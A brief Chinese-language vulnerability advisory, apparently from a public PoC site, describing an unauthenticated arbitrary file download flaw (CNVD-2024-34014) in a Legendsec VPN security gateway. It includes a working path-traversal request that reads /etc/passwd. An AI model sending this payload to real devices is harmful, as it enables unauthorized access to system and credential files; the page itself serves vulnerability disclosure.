网御VPN安全网关 /SSL/admin/UserFile 文件读取漏洞(CNVD-2024-34014)

2024-10-12 网御VPN安全网关 PoC Public

Description

北京网御星云信息技术有限公司是国内信息安全行业的领军企业,专业从事信息安全产品的研发、生产与销售。 北京网御星云信息技术有限公司网御VPN安全网关存在任意文件下载漏洞,攻击者可利用该漏洞在未经身份验证的情况下下载passwd等敏感文件。

PoC

GET /SSL/admin/UserFile?FileName=../../../etc/passwd HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities